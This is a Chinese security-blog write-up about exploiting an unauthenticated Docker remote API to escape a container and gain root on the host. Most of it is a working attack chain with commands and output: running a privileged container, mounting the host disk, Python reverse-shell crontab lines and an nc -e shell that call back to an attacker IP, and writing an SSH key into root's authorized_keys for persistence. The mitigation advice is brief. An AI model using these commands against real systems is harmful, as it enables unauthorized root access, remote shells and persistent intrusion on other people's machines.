0x00 漏洞简介
docker remote API未授权访问漏洞,此API主要目的是取代命令执行页面,开放2375监听容器时,会调用这个API,方便docker集群管理和扩展。
0x01 正文
验证漏洞存在
直接输入地址 http://your-ip:2375/version(端口会因为配置问题稍有出入) 若能访问,证明存在未授权访问漏洞。
测试可达性
┌──(kali㉿kali)-[~/Desktop]ping 192.168.249.202PING 192.168.249.202 (192.168.249.202) 56(84) bytes of data.64 bytes from 192.168.249.202: icmp_seq=1 ttl=128 time=1.97 ms64 bytes from 192.168.249.202: icmp_seq=2 ttl=128 time=2.26 ms^C192.168.249.202 ping statistics ---2 packets transmitted, 2 received, 0% packet loss, time 1002msrtt min/avg/max/mdev = 1.971/2.116/2.261/0.145 ms┌──(kali㉿kali)-[~/Desktop]docker -H tcp://192.168.249.202:5555 psCONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAME
常见dockers管理命令docker -H tcp://192.168.249.202:5555 ps #查看远程机器上docker运行情况docker -H tcp://192.168.249.202:5555 images #查看远程机器上的正在运行的docker镜像
漏洞利用
┌──(root㉿kali)-[/home/kali/Desktop]docker -H tcp://192.168.249.202:5555 pull alpineUsing default tag: latestlatest: Pulling from library/alpineDigest: sha256:bc41182d7ef5ffc53a40b044e725193bc10142a1243f395ee852a8d9730fc2adStatus: Image is up to date for alpine:latest:latest┌──(root㉿kali)-[/home/kali/Desktop]docker -H tcp://192.168.249.202:5555 run -it --privileged alpine bin/sh# lsbin etc lib mnt proc run srv tmp vardev home media opt root sbin sys usr# ifconfigeth0 Link encap:Ethernet HWaddr 02:42:AC:11:00:02inet addr:172.17.0.2 Bcast:172.17.255.255 Mask:255.255.0.0UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1RX packets:8 errors:0 dropped:0 overruns:0 frame:0TX packets:0 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:0RX bytes:656 (656.0 B) TX bytes:0 (0.0 B)lo Link encap:Local Loopbackinet addr:127.0.0.1 Mask:255.0.0.0UP LOOPBACK RUNNING MTU:65536 Metric:1RX packets:0 errors:0 dropped:0 overruns:0 frame:0TX packets:0 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:1000RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
逃逸过程
挂载硬盘sda2
# fdisk -lDisk /dev/sda: 894 GB, 960197124096 bytes, 1875385008 sectors116737 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytesDevice Boot StartCHS EndCHS StartLBA EndLBA Sectors Size Id Type0,32,33 522,75,1 2048 8390655 8388608 4096M 82 Linux swap* 522,75,2 1023,254,63 8390656 1875378175 1866987520 890G 83 LinuxDisk /dev/sdb: 894 GB, 960197124096 bytes, 1875385008 sectors116737 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytesDisk /dev/sdb doesn't contain a valid partition tableDisk /dev/sdf: 1863 GB, 2000398934016 bytes, 3907029168 sectors243201 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytesDisk /dev/sdf doesn't contain a valid partition tableDisk /dev/sdd: 1863 GB, 2000398934016 bytes, 3907029168 sectors243201 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytesDisk /dev/sdd doesn't contain a valid partition tableDisk /dev/sdc: 1863 GB, 2000398934016 bytes, 3907029168 sectors243201 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytesDisk /dev/sdc doesn't contain a valid partition tableDisk /dev/sde: 1863 GB, 2000398934016 bytes, 3907029168 sectors243201 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytesDisk /dev/sde doesn't contain a valid partition tableDisk /dev/dm-0: 1863 GB, 2000381018112 bytes, 3906994176 sectors243199 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytesDisk /dev/dm-0 doesn't contain a valid partition tableDisk /dev/dm-1: 1863 GB, 2000381018112 bytes, 3906994176 sectors243199 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytesDisk /dev/dm-1 doesn't contain a valid partition tableDisk /dev/dm-2: 1863 GB, 2000381018112 bytes, 3906994176 sectors243199 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytesDisk /dev/dm-2 doesn't contain a valid partition tableDisk /dev/dm-3: 894 GB, 960181043200 bytes, 1875353600 sectors116735 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytesDisk /dev/dm-3 doesn't contain a valid partition tableDisk /dev/dm-4: 1863 GB, 2000381018112 bytes, 3906994176 sectors243199 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytesDisk /dev/dm-4 doesn't contain a valid partition table# mkdir test# lsbin etc lib mnt proc run srv test usrdev home media opt root sbin sys tmp var# mount /dev/sda2 test# cd test# whoamiroot# touch just.txt# lsbin home lib64 log-2022-04 log-2022-08 proc srv varboot iDiscovery log-2021-09 log-2022-05 media root sysdev just.txt log-2021-11 log-2022-06 mnt run tmpetc lib log-2021-12 log-2022-07 opt sbin usr//至此sda2挂载到test下
尝试反弹shell
(crontab -l;printf " * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.159.130",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'n")|crontab -echo "*/1 * * * * root python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.159.130",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'" >> /test/etc/crontab
经过以上尝试发现均反弹不会来,冥思苦想最后发现是被攻击机不出内网。。。。
更换vps进行尝试
//centos安装ncyum install -y nc//被攻击机 反弹shellnc IP 6666 -e /bin/sh//vps 接受shellnc -lvp 6666
vps攻击机视角
虚拟机被攻击机视角
获取到真实主机的root权限
真实主机的网卡信息
远程连接
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsYNh4bLNmhQ7Cu64zYsIrxYWyEGz2dbd2B4s+SeX0h7c2p1UboZ1IUB60D3R05pExRcIxbX+P7k3PSeCnHHJG6JSqiahPxR7+J+sCvVr4Ki6inP87P8kpIRmXR2iTnIm5+Q/1cuxGgdF9ut6mBfUA4G8HV0AGhdsyaO6HdeS5iVYyc3tNfKDaZPqXi0UA6RPXDfhO9AfxUYn+sbHkJqTP9sI/4yRr+lN9UquyCGc03my16wThgSUp5aXxJqkpOuzSjHxBcsHWKFB/FfQVIGqDJuqU01V13NuL23ag8aDL root@" > /root/.ssh/authorized_keysssh root@IP -i id_rsa
成功写入
0x02 修复建议
-
设置ACL,只允许信任的IP端口连接对应端口
-
开启TLS,使用生成的证书进行认证
- End -
原文始发于微信公众号(NS Demon团队):实战之 docker-unauthorized-rce 虚拟机逃逸漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论